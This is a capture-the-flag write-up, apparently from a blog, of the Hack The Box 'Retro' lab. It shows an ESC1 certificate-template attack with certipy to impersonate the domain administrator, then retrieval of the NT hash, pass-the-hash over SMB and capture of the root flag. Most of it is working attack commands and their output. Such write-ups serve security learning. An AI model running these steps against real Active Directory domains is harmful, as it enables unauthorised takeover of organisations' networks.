┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ certipy req -u 'BANKING$' -p 'Password123!' -dc-ip 10.129.234.44 -template 'RetroClients' -ca 'retro-DC-CA' -upn 'administrator@retro.vl' -target dc.retro.vl -key-size 4096
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 13
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
Authenticating with that PFX fails with an object SID mismatch. Since the KB5014754 strong certificate mapping changes, the DC expects the certificate to carry the target account's SID (in the szOID_NTDS_CA_SECURITY_EXT extension) and rejects one whose SID does not match the account the UPN maps to. With ESC1 we control the request, so we just include the SID with -sid and request again.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ certipy auth -pfx administrator.pfx -dc-ip 10.129.234.44
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@retro.vl'
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[-] Object SID mismatch between certificate and user 'administrator'
[-] See the wiki for more information
First we need the administrator's SID, which is the domain SID followed by the administrator's RID (500). lookupsid.py prints the domain SID along with the RIDs:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ lookupsid.py retro.vl/'BANKING$':'Password123!'@10.129.234.44
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 10.129.234.44
[*] StringBinding ncacn_np:10.129.234.44[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2983547755-698260136-4283918172
498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: RETRO\Administrator (SidTypeUser)
501: RETRO\Guest (SidTypeUser)
502: RETRO\krbtgt (SidTypeUser)
512: RETRO\Domain Admins (SidTypeGroup)
513: RETRO\Domain Users (SidTypeGroup)
514: RETRO\Domain Guests (SidTypeGroup)
515: RETRO\Domain Computers (SidTypeGroup)
516: RETRO\Domain Controllers (SidTypeGroup)
Requesting again with the SID in the request works, and this time authentication succeeds and returns the administrator's NT hash (certipy also saves a TGT in administrator.ccache). Then we can grab the flag.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ certipy req -u 'BANKING$' -p 'Password123!' -dc-ip 10.129.7.245 -template 'RetroClients' -ca 'retro-DC-CA' -upn 'administrator@retro.vl' -target dc.retro.vl -key-size 4096 -sid 'S-1-5-21-2983547755-698260136-4283918172-500'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 10
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote certificate and private key to 'administrator.pfx'
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ certipy auth -pfx administrator.pfx -dc-ip 10.129.7 -domain retro.vl -username administrator
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[-] Got error: nameserver 10.129.7 is not a dns.nameserver.Nameserver instance or text form, IP address, nor a valid https URL
[-] Use -debug to print a stacktrace
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ certipy auth -pfx administrator.pfx -dc-ip 10.129.7.245 -domain retro.vl -username administrator
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@retro.vl'
[*] SAN URL SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Security Extension SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389
We have the NT hash, so we can pass it to impacket's smbclient.py; alternatively, the administrator.ccache that certipy wrote can be used with Kerberos (-k -no-pass) instead of the hash.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ smbclient.py retro.vl/administrator:''@10.129.7.245 -hashes :252fac7066d93dd009d4fd2cd0368389
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# ls
[-] No share selected
# shares
ADMIN$
C$
IPC$
NETLOGON
Notes
SYSVOL
Trainees
# use C$
# ls
drw-rw-rw- 0 Sun Jul 23 13:48:13 2023 $Recycle.Bin
drw-rw-rw- 0 Tue Apr 8 19:15:31 2025 $WinREAgent
-rw-rw-rw- 112 Wed Jun 11 07:16:27 2025 bootTel.dat
drw-rw-rw- 0 Tue Apr 8 20:18:00 2025 Config.Msi
drw-rw-rw- 0 Sun Jul 23 21:05:10 2023 Documents and Settings
-rw-rw-rw- 12288 Wed Jun 3 03:58:21 2026 DumpStack.log.tmp
drw-rw-rw- 0 Wed Jun 11 07:16:20 2025 found.000
drw-rw-rw- 0 Tue Apr 8 20:16:08 2025 inetpub
drw-rw-rw- 0 Tue Apr 8 20:12:49 2025 Notes
-rw-rw-rw- 1207959552 Wed Jun 3 03:58:21 2026 pagefile.sys
drw-rw-rw- 0 Sun Jul 23 22:03:07 2023 PerfLogs
drw-rw-rw- 0 Tue Apr 8 19:06:35 2025 Program Files
drw-rw-rw- 0 Sun Jul 23 22:03:07 2023 Program Files (x86)
drw-rw-rw- 0 Mon May 5 03:25:11 2025 ProgramData
drw-rw-rw- 0 Sun Jul 23 21:05:14 2023 Recovery
drw-rw-rw- 0 Sun Jul 23 14:11:48 2023 System Volume Information
drw-rw-rw- 0 Sun Jul 23 15:16:11 2023 Trainees
drw-rw-rw- 0 Sun Jul 23 13:47:59 2023 Users
drw-rw-rw- 0 Tue Apr 8 20:18:52 2025 Windows
# cd Users
# cd Administrator
# cd Desktop
# get root.txt
And there is the root flag:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ cat root.txt
40fce9c3f09024bcab29d377ee1ed071
Resources
- https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers
- https://www.semperis.com/blog/esc1-attack-explained/
- https://www.jimmexploit.blog/blog/timeroasting (about timeroasting, but it explains what pre2k accounts are and how they affect other attacks)
